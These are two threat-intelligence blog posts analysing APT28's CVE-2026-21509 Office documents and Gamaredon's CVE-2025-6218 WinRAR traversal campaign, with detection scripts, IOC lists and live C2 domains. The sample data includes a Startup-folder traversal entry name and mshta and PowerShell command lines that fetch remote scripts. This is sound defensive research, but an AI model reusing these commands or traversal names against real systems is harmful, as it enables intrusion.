EDIT: 04.02.2026: I have YARA Rules available for detection, contact me at contact@robin-dost.de if you need them.
After publishing this article, I received technical feedback regarding the root cause of CVE-2026-21509. Based on that input, I corrected several parts of the analysis.
Update Notes: The vulnerability does not rely on malformed OLE objects, and WebDAV is not part of the exploit primitive. CVE-2026-21509 is caused by an allowlist gap around Shell.Explorer.1, which Office still instantiates. WebDAV is only used as a delivery mechanism. The article has been updated accordingly.
Since the beginning of this year, we have again observed an increased number of attacks by APT28 targeting various European countries. In multiple campaigns, the group actively leverages the Microsoft Office vulnerability CVE-2026-21509 as an initial access vector.
This article focuses on how CVE-2026-21509 is used in practice, how relevant IOCs can be extracted efficiently from weaponized Word documents, and how the actor's own geofencing can be leveraged to infer operational target regions.
Before diving into the analysis, a brief look at CVE-2026-21509 itself.
Understanding CVE-2026-21509
CVE-2026-21509 comes down to a simple allowlist gap in Office.
Microsoft has been blocking browser OLE objects like Shell.Explorer and Shell.Explorer.2 for years. Shell.Explorer.1 just never made it onto that list. Attackers embed a Shell.Explorer.1 OLE object inside an RTF document. When Word parses the file, the object gets reconstructed and instantiated normally, because from Office's point of view it is still considered allowed. No macros. No scripts. No fancy exploit chain. Just a forgotten COM class.
Once loaded, the embedded browser object calls Navigate() and points to a remote resource, usually a .lnk file, which then becomes the actual execution vector. The document itself carries no payload. Its only purpose is to reach a state where Shell.Explorer.1 is active and allowed to fetch external content. Variations of this technique have been public since at least 2016-2018. CVE-2026-21509 merely formalizes Microsoft finally acknowledging that this specific ProgID should have been blocked a long time ago.
tldr;
APT28 abuses CVE-2026-21509 by embedding a forgotten OLE browser object (Shell.Explorer.1) into RTF documents. Office happily instantiates it, the object navigates to a remote .lnk, and that's your execution path. An allowlist gap that somehow survived for years. The documents themselves contain no payload. They only exist to get Office into a state where external shortcut files can be fetched. From there, the real infection chain starts.
Analyzed Samples
For this analysis, I looked at the following samples:
When I receive potentially malicious Word documents, my first step is usually to run oleid. In most common malicious documents, this already reveals macros, external references or other active content.
In this case, oleid reports a clean file. No macros, no external relationships, no obvious indicators.
This is expected.
The document is not a classic OLE container but an RTF file. In RTF, embedded objects are stored as hexadecimal data inside the document body using control words such as \object and \objdata. These objects do not exist as real OLE structures until Word parses the document and reconstructs them in memory.
oleid operates at the container level. It can only detect features that already exist as structured objects in the file. Since the embedded OLE data is still plain text at this stage, there is nothing for oleid to flag.
The exploit surface of CVE-2026-21509 only becomes visible after this reconstruction step. Tools like rtfobj replicate this part of Word's parsing logic by extracting and rebuilding the embedded objects from the RTF stream.
rtfobj -s all b2ba51b4491da8604ff9410d6e004971e3cd9a321390d0258e294ac42010b546.doc
Once reconstructed, the embedded objects resolve to Shell.Explorer.1. Some tools flag the CLSID as unknown, but Windows loads it normally. The containers themselves are valid OLE objects. The vulnerability is triggered solely because this specific ProgID is still allowed.
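As an added illustration of that reconstruction step (this is my own example code, not rtfobj and not one of the analyzed samples), the script below pulls every \objdata hex blob out of an RTF, decodes it and parses the OLE 1.0 ObjectHeader that each blob starts with: OLEVersion, FormatID and a length-prefixed class name. That class-name field is exactly where "Shell.Explorer.1" shows up, which is why a ProgID-based allowlist is the thing that matters here. The RTF it runs on is constructed inline, with one Shell.Explorer.1 object and one ordinary Word.Document.8 object; the simple regex does not handle \bin binary runs or deeply nested groups the way a real RTF tokenizer does.

```python
import re
import struct

# Browser-control ProgIDs. Office blocks Shell.Explorer and Shell.Explorer.2;
# Shell.Explorer.1 is the one the article describes as still instantiated.
# No document has a legitimate reason to embed any of them, so flag all three.
BROWSER_PROGIDS = {"Shell.Explorer", "Shell.Explorer.1", "Shell.Explorer.2"}

OLE1_VERSION = 0x00000501             # OLEVersion field of an OLE 1.0 ObjectHeader
FORMAT_NAMES = {1: "linked", 2: "embedded"}

# \objdata groups carry the object as a hex dump; \objclass states the ProgID.
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")
OBJCLASS_RE = re.compile(rb"\\objclass\s+([^}\\]+)")


def _read_lp_ansi(blob, off):
    """LengthPrefixedAnsiString: uint32 byte count (NUL included), then the bytes."""
    if off + 4 > len(blob):
        raise ValueError("truncated length prefix")
    (n,) = struct.unpack_from("<I", blob, off)
    off += 4
    if off + n > len(blob):
        raise ValueError("truncated string")
    return blob[off:off + n].rstrip(b"\x00").decode("latin-1"), off + n


def parse_ole1_header(blob):
    """Parse the OLE 1.0 ObjectHeader at the start of an \\objdata blob.
    Returns None if the bytes do not look like one."""
    if len(blob) < 8:
        return None
    version, format_id = struct.unpack_from("<II", blob, 0)
    if version != OLE1_VERSION or format_id not in FORMAT_NAMES:
        return None
    try:
        class_name, off = _read_lp_ansi(blob, 8)
        topic_name, off = _read_lp_ansi(blob, off)
        item_name, off = _read_lp_ansi(blob, off)
    except ValueError:
        return None
    native_size = None
    if format_id == 2 and off + 4 <= len(blob):   # EmbeddedObject: NativeDataSize follows
        (native_size,) = struct.unpack_from("<I", blob, off)
    return {"format": FORMAT_NAMES[format_id], "class_name": class_name,
            "topic_name": topic_name, "item_name": item_name,
            "native_size": native_size}


def declared_classes(rtf):
    """ProgIDs the document declares via \\objclass (attacker-controlled text)."""
    return [c.strip().decode("latin-1") for c in OBJCLASS_RE.findall(rtf)]


def scan_rtf(rtf):
    """Rebuild every \\objdata blob and report what its OLE 1.0 header claims to be."""
    findings = []
    for m in OBJDATA_RE.finditer(rtf):
        hexdata = re.sub(rb"\s+", b"", m.group(1))
        hexdata = hexdata[:len(hexdata) & ~1]        # drop a dangling nibble
        header = parse_ole1_header(bytes.fromhex(hexdata.decode("ascii")))
        if header is None:
            findings.append({"offset": m.start(), "class_name": None, "format": None,
                             "native_size": None, "flagged": False})
            continue
        findings.append({"offset": m.start(), **header,
                         "flagged": header["class_name"] in BROWSER_PROGIDS})
    return findings


# Constructed sample, not one of the analyzed documents: a Shell.Explorer.1
# control followed by an ordinary embedded Word document. The native data
# ("deadbeef", "d0cf") is filler; real objects carry an OLE2 container there.
SAMPLE_RTF = (
    rb"{\rtf1\ansi\deff0{\fonttbl{\f0 Calibri;}}\pard Quarterly report.\par" b"\n"
    rb"{\object\objemb{\*\objclass Shell.Explorer.1}{\*\objdata" b"\n"
    b"01050000 02000000 11000000 5368656c6c2e4578706c6f7265722e3100\n"
    b"00000000 00000000 04000000 deadbeef}}" rb"\par" b"\n"
    rb"{\object\objemb{\*\objclass Word.Document.8}{\*\objdata" b"\n"
    b"01050000 02000000 10000000 576f72642e446f63756d656e742e3800\n"
    b"00000000 00000000 02000000 d0cf}}" rb"\par}"
)

if __name__ == "__main__":
    print("declared:", declared_classes(SAMPLE_RTF))
    for f in scan_rtf(SAMPLE_RTF):
        print(f)
```

The class name in the OLE 1.0 header is attacker-supplied text, just like the \objclass control word, so a mismatch between the two is a signal in itself; rtfobj additionally reads the CLSID from the OLE2 container inside the native data, which is the better key for a blocklist.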
After extracting the embedded objects, I inspected the resulting files using xxd. At this stage, strings did not yield anything particularly useful, which is not surprising given that the document is not designed to carry a readable payload.
From this data, the following strings could be extracted:
The use of WebDAV for delivery is more an operational choice than a technical requirement of CVE-2026-21509. The same behavior can be triggered using plain HTTP or HTTPS URLs. The exploit primitive is simple: the embedded Shell.Explorer.1 object calls Navigate() to a remote URI. What happens next is handled by the legacy Internet Explorer engine (ieframe.dll), which does not implement modern protections such as SmartScreen or Smart App Control. WebDAV mainly provides delivery convenience: it exposes remote files as filesystem-like objects via the Windows WebClient service, but it does not change the exploit mechanics.
As already mentioned, the Word document itself contains no payload and performs no execution. Its only purpose is to instantiate Shell.Explorer.1 and trigger navigation to a remote shortcut file. The .lnk becomes the actual execution vector. When accessed, the user is prompted to open or save the file, and any follow-on activity happens outside the document. The query parameter in the URL is client-side only and used to avoid caching; it has no functional relevance for the server.
Identifying Targets
While analyzing the documents and extracted URLs, it became apparent that they reference potential target regions:
/cz/ -> Czech Republic
/buch/ -> Bucharest / Romania
/pol/ -> Poland
Additional indicators inside the Word documents further support this assessment:
Romanian language content
References to Ukraine
Mentions of Slovenia
EU-related context
None of this is accidental.
At this point, the next step is validation. Russian threat actors are known to rely heavily on geofencing and APT28 is no exception. Fortunately, this behavior can be turned into a useful source of intelligence for us ^-^
Turning Geofencing into Intelligence
The first step was to take a closer look at the domains extracted from the samples:
wellnessmedcare.org
193.187.148.169
freefoodaid.com
159.253.120.2
What stands out here is the choice of hosting locations. Both IP addresses belong to providers in Romania and Moldova. It is reasonable to assume that these locations were selected to match the campaign's intended target regions.
Next, I attempted to replicate the WebDAV requests generated by Windows in order to test the observed geofencing behavior. To do this, I executed the document in a sandbox and captured the resulting network traffic.
Geofence Analysis
To validate the geofencing, I needed to determine which proxy locations were required to access the malicious resources without being blocked. After identifying suitable proxies, I performed test requests using a custom script, once without a proxy and once using a Romanian proxy.
Without proxy:
With proxy:
The result is fairly clear. Requests originating from outside the expected regions are rejected with HTTP 403, while requests routed through a Romanian proxy succeed. This pattern can be used to validate likely operational target regions.
Out of 114 tested countries, only three were allowed access: Czech Republic, Poland and Romania. This aligns perfectly with the indicators observed earlier in the documents and URLs.
As this example shows, defensive measures such as geofencing can provide valuable intelligence when analyzed properly. Even access control mechanisms can leak information about an actor's operational focus if you know where to look. The second domain, freefoodaid.com, was already offline at the time of analysis. Given how short-lived APT28 infrastructure tends to be, this is hardly surprising. It is reasonable to assume that similar geofencing behavior would have been observable there as well, but for demonstration purposes, the remaining data is more than sufficient.
How to protect against these attacks
Update Microsoft Office and enforce a structured update routine. Treat unexpected Word documents as untrusted and have them analyzed before opening them. (or stop using windows :3)
Conclusion
CVE-2026-21509 works because it fits neatly into how Office processes documents today. The exploit relies on Office instantiating an allowed OLE object during normal parsing, not on macros or embedded payloads, which makes it easy to overlook during initial analysis. The tradecraft follows a familiar pattern. Remote shortcut files and strict geofencing have been used by APT28 before and continue to show up in current campaigns. WebDAV appears here mainly as a delivery detail. The technique is stable, requires little user interaction, and sidesteps many modern Office protections by falling back to legacy browser behavior. At the same time, this setup exposes useful signals. Geofencing decisions, hosting locations and access behavior provide insight into intended target regions when tested systematically.
In this case, the infrastructure behavior aligns closely with the indicators found inside the documents. From an analytical POV, the value lies less in the exploit itself and more in what can be inferred from how it is deployed and constrained.
How a Russian Threat Actor Uses a Recent WinRAR Vulnerability in Their Ukraine Operations
Today we’re taking a look at several malware samples from the advanced persistent threat group “Primitive Bear” aka “Gamaredon”.
Primitive Bear is a Russian state-sponsored Advanced Persistent Threat (APT) group that has been active since at least 2013. With high confidence, the group is attributed to the Federal Security Service of the Russian Federation (FSB), Russia’s domestic intelligence service.
The most recently circulating malware samples caught my attention because they all follow the same pattern and exploit a newly disclosed vulnerability, CVE-2025-6218, to load additional malware in later stages.
In this post, I want to walk you through the methodology and the infrastructure used by the attacker.
Below is an overview of the samples I analyzed that make use of CVE-2025-6218, along with their origin. I will continue analyzing additional samples in order to map the attacker’s infrastructure as comprehensively as possible.
Повістка про виклик_357-16230-25_24.10.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_357-16230-25_24.10.2025.HTA
Щодо надання інформації (військова частина А0135_11-967_11.11.2025).pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_11-967_11.11.2025.HTA
Перегляд підходів до призову під час мобілізації_2-3716-25_07.11.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_2-3716-25_07.11.2025.HTA
Запит на отримання інформації командира військової частини А0135_11-967_10.11.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_11-967_10.11.2025.HTA
Передати засобами АСУ Дніпро_2_1_1_7755_11.11.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_2_1_1_7755_11.11.2025.HTA
Передати засобами АСУ Дніпро_2_1_1_7755_12.11.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_2_1_1_7755_12.11.2025.HTA
Передати засобами АСУ Дніпро_3_8_2_7442_13.11.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_3_8_2_7442_13.11.2025.HTA
Передати засобами АСУ Дніпро_2_7_4_62_13.11.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_2_7_4_62_13.11.2025.HTA
The campaign I observed clearly targets Ukrainian entities, something we can identify mainly by the filenames used:
Original filename -> English translation
Повістка про виклик_357-16230-25_24.10.2025.pdf -> Subpoena_357-16230-25_24.10.2025.pdf
Щодо надання інформації (військова частина А0135_11-967_11.11.2025).pdf -> Regarding the provision of information (military unit A0135_11-967_11.11.2025).pdf
Перегляд підходів до призову під час мобілізації_2-3716-25_07.11.2025.pdf -> Review of approaches to conscription during mobilisation_2-3716-25_07.11.2025.pdf
Запит на отримання інформації командира військової частини А0135_11-967_10.11.2025.pdf -> Request for information from the commander of military unit A0135_11-967_10.11.2025.pdf
Передати засобами АСУ Дніпро_2_1_1_7755_11.11.2025.pdf -> Transfer via automated control system Dnipro_2_1_1_7755_11.11.2025.pdf
Передати засобами АСУ Дніпро_2_1_1_7755_12.11.2025.pdf -> Transfer via automated control system Dnipro_2_1_1_7755_12.11.2025.pdf
Передати засобами АСУ Дніпро_3_8_2_7442_13.11.2025.pdf -> Transfer via automated control system Dnipro_3_8_2_7442_13.11.2025.pdf
Передати засобами АСУ Дніпро_2_7_4_62_13.11.2025.pdf -> Transfer via automated control system Dnipro_2_7_4_62_13.11.2025.pdf
Primitive Bear is well-known for its spear-phishing operations, so none of this is surprising. What is new, however, is the use of RAR archives to load additional malware. Unfortunately, we cannot definitively identify all recipients of these samples, but the filenames give us a pretty good idea of who they were intended for:
File -> probable recipient / context (what in the name suggests it)
Повістка про виклик_357-16230-25_24.10.2025.pdf -> authorities/judiciary or territorial recruitment centers (ТЦК та СП) for mobilization ("Повістка" can mean a court/investigative summons or a military summons)
Щодо надання інформації (військова частина А0135_11-967_11.11.2025).pdf -> military unit A0135 (Військова частина А0135) (the unit is named explicitly)
Перегляд підходів до призову під час мобілізації_2-3716-25_07.11.2025.pdf -> mobilization/personnel offices: ТЦК та СП, Mobilization Department in the MoD/General Staff (thematic focus: approaches to conscription)
Запит на отримання інформації командира військової частини А0135_11-967_10.11.2025.pdf -> commander of military unit A0135 (explicitly addressed)
Передати засобами АСУ Дніпро_2_1_1_7755_11.11.2025.pdf -> positions with access to "АСУ Дніпро" (АСУ = automated management/information system), typically MoD/ТЦК/human resources ("transmit via ASU Dnipro" points to an internal administration/data channel)
Передати засобами АСУ Дніпро_2_1_1_7755_12.11.2025.pdf -> as above (follow-up document with a different date)
Передати засобами АСУ Дніпро_3_8_2_7442_13.11.2025.pdf -> as above (other internal classification/filing codes)
Передати засобами АСУ Дніпро_2_7_4_62_13.11.2025.pdf -> as above
Now that we better understand the context of the samples, we can dive into the actual analysis. Since all samples share a nearly identical structure, we’ll look at the most recent one found, with the hash 237696ecc370688a8d1894eb2f95af53a3c0f8d42eb540b7f529b4d4f4492bc0
The victim receives a RAR archive containing two files: a fake PDF and an HTML Application (HTA). The HTA file always has the same bizarre naming scheme:
This immediately reveals the exploitation of CVE-2025-6218.
The vulnerability is a critical directory traversal to remote code execution (RCE) flaw in WinRAR (up to and including version 7.11) on Windows. The bug lies in how WinRAR processes file paths inside RAR archives: an attacker can craft an archive entry that writes files outside the intended extraction folder, e.g. directly into the user's Startup directory.
Once a file lands in an auto-executed location, it runs on next login or reboot, resulting in RCE with the current user’s privileges. It still requires user interaction, such as opening a malicious archive. The issue is fixed in WinRAR 7.12 (Beta 1) and later.
If you want to get a feeling for the vulnerability, a PoC is definitely worth looking at.
So what actually happens when the victim opens the RAR file?
The user opens the archive.
The archive extracts a .pdf into the current directory.
The archive silently extracts an .hta containing obfuscated VBScript into the Startup folder.
After reboot, the VBScript fetches additional malware.
It’s worth noting that the exploitation of CVE-2025-6218 requires only minimal user interaction. In most cases, the victim merely has to open the malicious RAR archive. No special system configuration is required, no sandbox needs to be disabled, and no “advanced mode” must be enabled. WinRAR’s default extraction behavior is sufficient for the path traversal to write an HTA file directly into the user’s Startup folder.
Long story short: the attacker relies only on the victim doing what victims do best, double-clicking whatever lands in their inbox.
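To make the traversal concrete, here is an added example (my own code, not WinRAR's and not the PoC referred to above) of the check a safe extractor has to make for every entry name before writing anything: resolve the name against the extraction directory, refuse anything that climbs above it or is absolute, and raise the severity further when the landing spot is the Startup folder. The entry names are constructed for the demo; the second one mirrors the carrier.pdf:..\..\ pattern from the listing above, where the colon is NTFS alternate-data-stream syntax and the stream name itself carries the traversal.

```python
import ntpath
import re

DRIVE_RE = re.compile(r"^[A-Za-z]:[\\/]")
STARTUP_MARK = "start menu/programs/startup/"
AUTORUN_EXTS = {".hta", ".vbs", ".vbe", ".js", ".jse", ".wsf", ".lnk",
                ".exe", ".scr", ".dll", ".cmd", ".bat", ".ps1"}


def split_entry(name):
    """Split 'carrier.pdf:stream\\path' into (carrier, stream).

    A colon is illegal in a Windows file name, so inside an archive entry it
    can only be NTFS alternate-data-stream syntax. The stream part is what is
    written to disk, relative to the directory the carrier file lands in."""
    if DRIVE_RE.match(name):            # 'C:\...' is a drive letter, not an ADS
        return name, None
    carrier, sep, stream = name.partition(":")
    return (carrier, stream) if sep else (name, None)


def resolves_outside(path):
    """True if the path is absolute or climbs above the extraction directory."""
    if DRIVE_RE.match(path) or path.startswith(("\\", "/")):
        return True
    depth = 0
    for part in re.split(r"[\\/]+", path):
        if part in ("", "."):
            continue
        if part == "..":
            depth -= 1
            if depth < 0:               # one '..' too many: we are above the root
                return True
        else:
            depth += 1
    return False


def assess_entry(name):
    """Describe where an entry would really end up and why that is a problem."""
    carrier, stream = split_entry(name)
    effective = name if stream is None else ntpath.join(ntpath.dirname(carrier), stream)
    norm = effective.replace("\\", "/").lower()
    return {
        "entry": name,
        "ads": stream is not None,
        "escapes": resolves_outside(effective),
        "startup": STARTUP_MARK in norm,
        "autorun_ext": ntpath.splitext(effective)[1].lower() in AUTORUN_EXTS,
    }


def suspicious_entries(names):
    """Entries a safe extractor must refuse: traversal, absolute paths, or any ADS."""
    return [a for a in map(assess_entry, names)
            if a["escapes"] or a["startup"] or a["ads"]]


# Constructed entry names (not taken from a real archive). The second one
# reproduces the carrier.pdf:..\..\ pattern shown in the listing above with the
# separators restored to backslashes.
SAMPLE_ENTRIES = [
    "Повістка про виклик_357-16230-25_24.10.2025.pdf",
    "Повістка про виклик_357-16230-25_24.10.2025.pdf:"
    r"..\..\..\..\..\..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\357-16230-25_24.10.2025.HTA",
    r"docs\..\..\update.hta",
    r"docs\sub\..\report.txt",
    r"C:\Users\Public\Desktop\helper.exe",
]

if __name__ == "__main__":
    for finding in suspicious_entries(SAMPLE_ENTRIES):
        print(finding)
```

Note that docs\sub\..\report.txt is accepted: a .. that stays inside the extraction root is harmless, and rejecting every .. would break legitimate archives. The depth counter is what distinguishes the two cases, and it is the same check that has to be applied to the ADS stream name, not just to the part of the entry before the colon.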
Now let’s take a look at what such an HTA file actually looks like:
We see an obfuscation attempt that is, let's put it politely, more bad than good. Between the lines of the actual payload there are a lot of junk lines:
These can be filtered out easily by looking at each assigned variable. If a variable never gets used or only references itself, it can be safely removed. I did the cleanup manually, because the scripts are tiny and the obfuscation is by no means a masterpiece.
After removing the junk lines and renaming the important variables, I ended up with the following result:
The entire deobfuscation process took about five minutes. The script isn’t complex, so let’s walk through it.
The string pretends to be a legitimate Windows component.
Using mshta.exe is classic: this Windows binary can directly execute remotely hosted HTA/HTML scripts, a typical Living-off-the-Land Binary (LOLBIN) abuse.
president.gov.ua@ looks like an official Ukrainian domain, but everything before the @ in a URL is the userinfo part, which the URL parser discards when choosing the host to connect to.
The real host is readers.serveirc.com, a free DynDNS subdomain acting as C2 or malware hosting server.
3. It executes the payload silently
wshell.Run payload
4. Error suppression
On Error Resume Next
Runtime errors are ignored to avoid crashes or prompts.
5. It closes itself
Close
The script exists purely as a loader/downloader. No real payload is inside; instead it fetches the actual malware (another HTA, VBS, or EXE) from readers.serveirc.com.
This aligns perfectly with Primitive Bear’s usual TTPs:
multi-stage payload chains ending in backdoors for surveillance and exfiltration (e.g., Pteranodon, GammaLoad)
abuse of Windows-native binaries (mshta.exe, wscript.exe)
phishing documents themed around Ukrainian government topics (e.g., “повістка.pdf”)
fast-changing C2 infrastructure on free DNS services (serveirc.com, myftp.biz, ddns.net)
Primitive Bear’s operations often end in the deployment of modular backdoors such as Pteranodon or GammaLoad, both of which are staples of the group’s espionage toolkit:
Pteranodon: A long-running backdoor family used by Primitive Bear since at least 2016. It supports classic cyber-espionage features such as screenshot capture, file exfiltration, keystroke logging, command execution, and staged payload delivery. Modular, noisy, but effective enough for long-term access.
GammaLoad: A lightweight downloader/backdoor frequently used as the “next stage” after initial compromise. Typically retrieves secondary modules, maintains C2 connectivity, and prepares the system for more persistent implants. Often deployed through simple LOLBIN-based loaders (like the one used here).
Nothing revolutionary, just FSB’s usual grab-bag of surveillance toys 😉
Infrastructure used in the 2025 Ukraine Campaign (so far)
Throughout my analysis, I reviewed a large number of recent samples (October – November) from this threat actor. Below is a summary and visualization of the infrastructure I identified.
The actor makes heavy use of DynDNS subdomains, such as:
readers.serveirc.com
dears.serveirc.com …and many others
All of these can be attributed to No-IP, which gives us a pool of recurring IP addresses (including IPs not associated with a Dyn-DNS domain name):
IP address: provider (country)
194.58.66.5: BAXET-GROUP-INC – interlir.com (India)
194.58.66.132: BAXET-GROUP-INC – interlir.com (India)
194.58.66.192: BAXET-GROUP-INC – interlir.com (India)
194.87.240.141: relcom.com (Czech Republic)
194.87.230.166: BAXET-GROUP-INC – interlir.com (Greece)
194.87.240.215: relcom.com (Czech Republic)
185.39.204.82: globconnex.com (Turkey)
45.141.234.234: globconnex.com (Ireland)
5.8.18.46: Putin (Russia)
Some of these IP addresses are provided by InterLIR, including the relcom.com addresses. InterLIR is essentially an IP address marketplace: companies in need of IPv4 or IPv6 space can buy, rent, or sub-lease unused ranges. The platform advertises fast provisioning, legally vetted transfers, and a European business focus.
Since IPv4 addresses are scarce (and expensive), entire micro-economies have formed around services like this, which attackers happily exploit for disposable infrastructure.
I also rechecked which of the domains still resolve to an active host. During that process, I identified fourteen domains that are currently still active and are likely still being used by the threat actor.
acess-pdf.webhop.me
backup.9fvzesn.us
creates.webhop.me
dears.serveirc.com
digitall.webhop.me
dilopendos.serveirc.com
fixer.serveirc.com
google-pdf.redirectme.net
hosting-redirect.sytes.net
political-news.serveirc.com
freedynamicdns.net
readers.serveirc.com
serversftp.serveirc.com
yeard.serveirc.com
Based on the information available so far, we can also compile a final overview of the files that have been distributed through this infrastructure:
This is not the full list of distributed files in this campaign, but I'll keep track of further samples and update the list accordingly.
Recommendations for Defenders and Blue Teams
To mitigate and detect this campaign (and similar WinRAR-based exploitation attempts), I recommend the following defensive measures:
Update WinRAR immediately: ensure that WinRAR is updated to version 7.12 (Beta 1) or later, where CVE-2025-6218 has been patched.
Block execution of HTA files: in most enterprise environments, .hta files should not be executed at all. Enforce this via AppLocker, WDAC, or enterprise GPO restrictions.
Monitor for LOLBIN misuse: flag suspicious executions of:
mshta.exe
wscript.exe
powershell.exe (especially with remote URLs)
Monitor the Startup folder: creation of .hta, .vbs, .js, or unknown executables inside %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup should always be treated as a high-severity alert, so always have an eye on this lol.
Inspect email attachments: particularly RAR/ZIP archives containing unusual path structures or files with "hidden extensions" (file.pdf:.hta, etc.).
Network defense: block known C2 domains and sinkhole DynDNS-based infrastructure where possible.
Endpoint logging: ensure Sysmon or a comparable EDR solution logs:
Process creation
File modification in Startup paths
Network connections from LOLBINs
Suspicious command-line parameters
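An added example of what the "Monitor the Startup folder" and "Monitor for LOLBIN misuse" items look like as detection logic (my own code, not a vendor rule and not part of the original post): it evaluates Sysmon-style FileCreate (Event ID 11) and ProcessCreate (Event ID 1) records, flags autorun-type files landing in the Startup folder and script hosts launched with a remote URL or UNC path, and extracts the host a URL really connects to so that a userinfo prefix such as president.gov.ua@ cannot hide the DynDNS host behind it. The events are constructed dicts using Sysmon's field names; a real deployment would read them from the event log or a SIEM.

```python
import ntpath
import re
from urllib.parse import urlsplit

STARTUP_RE = re.compile(r"\\start menu\\programs\\startup\\", re.IGNORECASE)
AUTORUN_EXTS = {".hta", ".vbs", ".vbe", ".js", ".jse", ".wsf", ".lnk",
                ".exe", ".scr", ".cmd", ".bat", ".ps1"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe"}
# A URL, or a UNC path (which the WebClient service will happily fetch over WebDAV).
REMOTE_RE = re.compile(r"(https?://\S+|\\\\\S+)", re.IGNORECASE)


def real_host(url):
    """Host a URL actually connects to. Anything before '@' in the authority is
    userinfo, not the host, so president.gov.ua@readers.serveirc.com reads like
    an official domain while resolving readers.serveirc.com."""
    return (urlsplit(url).hostname or "").lower()


def evaluate(event):
    """Apply both rules to one Sysmon-style event dict; return a list of hits."""
    hits = []
    image = ntpath.basename(event.get("Image", "")).lower()
    if event.get("EventID") == 11:                      # FileCreate
        target = event.get("TargetFilename", "")
        if STARTUP_RE.search(target) and ntpath.splitext(target)[1].lower() in AUTORUN_EXTS:
            hits.append({"rule": "autorun-dropped-in-startup",
                         "process": image, "file": target})
    elif event.get("EventID") == 1:                     # ProcessCreate
        m = REMOTE_RE.search(event.get("CommandLine", ""))
        if image in SCRIPT_HOSTS and m:
            ref = m.group(1)
            remote = real_host(ref) if ref.lower().startswith("http") else ref
            hits.append({"rule": "script-host-remote-content",
                         "process": image, "remote": remote})
    return hits


def scan(events):
    return [hit for event in events for hit in evaluate(event)]


# Constructed events (not real telemetry) using Sysmon's field names.
STARTUP = r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
SAMPLE_EVENTS = [
    {"EventID": 11, "Image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "TargetFilename": STARTUP + r"\357-16230-25_24.10.2025.HTA"},
    {"EventID": 11, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\victim\Downloads\report.pdf"},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://president.gov.ua@readers.serveirc.com/news.hta"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\victim\notes.txt"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File \\193.187.148.169@80\DavWWWRoot\cz\update.ps1"},
    {"EventID": 11, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": STARTUP + r"\desktop.ini"},                 # Windows writes this itself
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The extension filter is what keeps the Startup rule from firing on desktop.ini, and the host extraction is what turns the mshta hit into a usable indicator (readers.serveirc.com) rather than the decoy string in front of the @. A local mshta.exe launch is deliberately not matched by this second rule; if your environment has no business use for mshta at all, block it outright as recommended above rather than trying to enumerate the bad invocations.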
Basically: watch for anything that behaves like Windows, but shouldn’t ^-^